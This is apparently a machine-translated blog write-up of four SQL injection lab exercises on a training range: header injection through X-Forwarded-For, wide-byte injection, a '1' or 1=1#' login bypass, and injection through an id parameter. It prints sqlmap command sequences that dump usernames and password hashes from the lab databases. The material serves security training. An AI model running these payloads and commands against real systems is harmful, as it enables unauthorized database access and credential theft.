当前位置:网站首页>Web security SQL injection vulnerability (1)
Web security SQL injection vulnerability (1)
2022-07-06 02:53:00 【Half a watermelon】
SQL Injection principle : Some malicious users , In the process of submitting the query request take SQL Insert the statement into the request content , At the same time, the program itself believes too much in the content entered by the user , There is no user inserted SQL Statement for any filtering , Which leads to SQL The statement is directly executed by the server .
The content of the test :(1) forge http Header file injection .
(2) Exploitation of wide byte injection vulnerability
(3) Login with any password , Construct statement bypass
(4) Make changes to the login page sql Injection test
test machine :kali link :https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg
Extraction code :tian
The range is : Murdoch College's online shooting range : Mohist College _ Focus on network security personnel training
1. By forging http Header information , Bypass the server for ip Address restrictions , Find the injection point again Get your account number and password .
First step : Go to the login page .
The second step : Just enter an account and password .
Found login failed .
The third step : use Burp Grab the bag .
add to :x-forwarded-for:1.1.1.1
It is found that the added address is returned 1.1.1.1( explain : Here you are SQL Inject )
Step four : add to :x-forwarded-for:* Save as txt file .
Step five : use sqlmap scanning The saved 1.txt file .
command :sqlmap -r /root/1.txt --batch --current-db
【--batch 】: Default sqlmap Proposed by the tool ( whether ) by :y 【--current-db】: Display the current database in use .
find x-forwarded-for The injection point of
Step six : Look at all the tables in the database .
command :sqlmap -r /root/1.txt --batch --tables -D "webcalendar"
【--tables -D "webcalendar"】: hold webcalendar All the tables in the database are displayed .
Find out webcalendar There are two tables in the database .
Step seven : View all the lists in the table .
command :sqlmap -r /root/1.txt --batch --columns -T "user"
【--columns -T 'user'】: hold user All the columns in the table are displayed .
Find out user There are three rows in the table .
Step eight : View the contents of the list
command :sqlmap -r /root/1.txt --batch --dump -C "username,password"
【--dump -C "username,password"】: hold username and password The contents of the column are displayed .
You can see that the contents are account and password .
Step nine : If you have an account and password to log in, you can get flag .
2. Login interface exists sql Wide byte injection vulnerability , Try entering special characters , Make the page report an error , Verify its existence sql Inject , Then use the wide byte injection vulnerability to find the login account and password .
First step : Go to the login page .
Tried to fill in the account and password casually , I can't find out . Then view the page source code , Found a hyperlink .
The second step : Text hyperlink here, then click .
Come to the injection page .
The third step : Input %df', Make the page report an error . ( Verify presence SQL Wide byte injection vulnerability )
SQL Principle analysis of wide byte injection : addslashes() This function will ' Escape to \
gbk When coding %df and \ The coding %5c Merge into one character
thus ' Can escape
Step four : Use sqlmap(sqlmap Medium and wide byte plug-ins )
command :sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --dbs
【--tamper=unmagicquotes.py】 yes :sqlmap Wide byte plug-in in 【--dbs】 yes : Display all databases .
Find a 5 A database .
Step five : see mozhe_discuz_stormgroup All the tables in the database .
command :sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --tables -D "mozhe_discuz_stormgroup"
【--tables -D "mozhe_discuz_stormgroup"】: hold mozhe_discuz_stormgroup All the tables in the database are displayed .
Find two tables ( noticw and stormgroup_member ).
Step six : Look at these two notice ,stormgroup_member What's in the table
command :sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --columns -T "notice,stormgroup_member"
【--columns -T "notice,stormgroup_member"】: hold notice and stormgroup_member All the columns in the table are displayed .
find notice and stormgroup_member Columns of the table .
Step seven : We found that stormgroup_member There are columns of account and password in the table , All we look at stormgroup_member The content of
command : sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --dump -C "name,password"
【--dump -C "name,password"】: hold name and password The contents of the column are displayed .
Find the account and password ( Password is md5 Encrypted )
Step eight : use md5 Just decrypt it .( Then log in with your account and password )
3. Any password exists in the login interface , Construct statements to bypass server-side validation , And log in successfully .
First step : Go to the login page .
The second step : Test for presence Login with any password , All of us use universal passwords .
(1) Enter... In the account number :1' or 1=1#
(2) password : Enter it casually or leave it blank
Login successful ( Get flag ):
4. Make changes to the login page sql Injection test , Get the account and password of the current database .
First step : Click the location of the hyperlink .
Incoming page , Found links with ?id=1
The second step : use sqlmap Tool to find out if there is SQL Loophole
command : sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --current-db
【--batch 】: Default sqlmap Proposed by the tool ( whether ) by :y 【--current-db】: Display the current database in use .
Find four injection points and The name of the current database .
The third step : see mozhe_discuz_stormgroup All the tables in the database .
command :sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --tables -D "mozhe_discuz_stormgroup"
【--tables -D "mozhe_discuz_stormgroup"】: hold mozhe_discuz_stormgroup All the tables in the database are displayed .
find mozhe_discuz_stormgroup Two tables in the database .
Step four : see stormgroup_member All the columns in the table
command :sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --columns -T "stormgroup_member"
【--columns -T "stormgroup_member"】: hold stormgroup_member All the columns in the table are displayed .
find stormgroup_member The table has three columns .
Step five : see name and password The contents of these two columns .
command :sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --dump -C "name,password"
【--dump -C "name,password"】: hold name and password The contents of the column are displayed .
Find the account and password ( Password is md5 Encrypted )( The account number and password are also the same as The second question is As like as two peas )
Step six : use md5 Just decrypt it .( Then log in with your account and password )
边栏推荐
- 【Kubernetes 系列】一文學會Kubernetes Service安全的暴露應用
- What is the investment value of iFLYTEK, which does not make money?
- Function knowledge points
- My C language learning record (blue bridge) -- on the pointer
- ReferenceError: primordials is not defined错误解决
- MySQL winter vacation self-study 2022 11 (8)
- 会员积分营销系统操作的时候怎样提升消费者的积极性?
- #PAT#day10
- Thinking on Architecture Design (under continuous updating)
- Introduction to robotframework (III) Baidu search of webui automation
猜你喜欢
ERA5再分析资料下载攻略
【指针训练——八道题】
PMP practice once a day | don't get lost in the exam -7.5
Solve 9 with C language × 9 Sudoku (personal test available) (thinking analysis)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 16
【 kubernets series】 a Literature Study on the Safe exposure Applications of kubernets Service
"Hands on learning in depth" Chapter 2 - preparatory knowledge_ 2.5 automatic differentiation_ Learning thinking and exercise answers
[network security interview question] - how to penetrate the test file directory through
Li Kou today's question -729 My schedule I
Which ecology is better, such as Mi family, graffiti, hilink, zhiting, etc? Analysis of five mainstream smart brands
随机推荐
Force buckle 146 LRU cache
Zhang Lijun: penetrating uncertainty depends on four "invariants"
Reverse repackaging of wechat applet
Yyds dry inventory comparison of several database storage engines
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 6
Large scale DDoS attacks take Myanmar offline
Codeforces 5 questions par jour (1700 chacune) - jour 6
不赚钱的科大讯飞,投资价值该怎么看?
How to accurately identify master data?
#PAT#day10
力扣今日題-729. 我的日程安排錶 I
主数据管理理论与实践
My C language learning record (blue bridge) -- under the pointer
C # create self host webservice
原型图设计
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 21
How to read excel, PDF and JSON files in R language?
Pat 1084 broken keyboard (20 points) string find
DDoS "fire drill" service urges companies to be prepared
MySQL winter vacation self-study 2022 11 (9)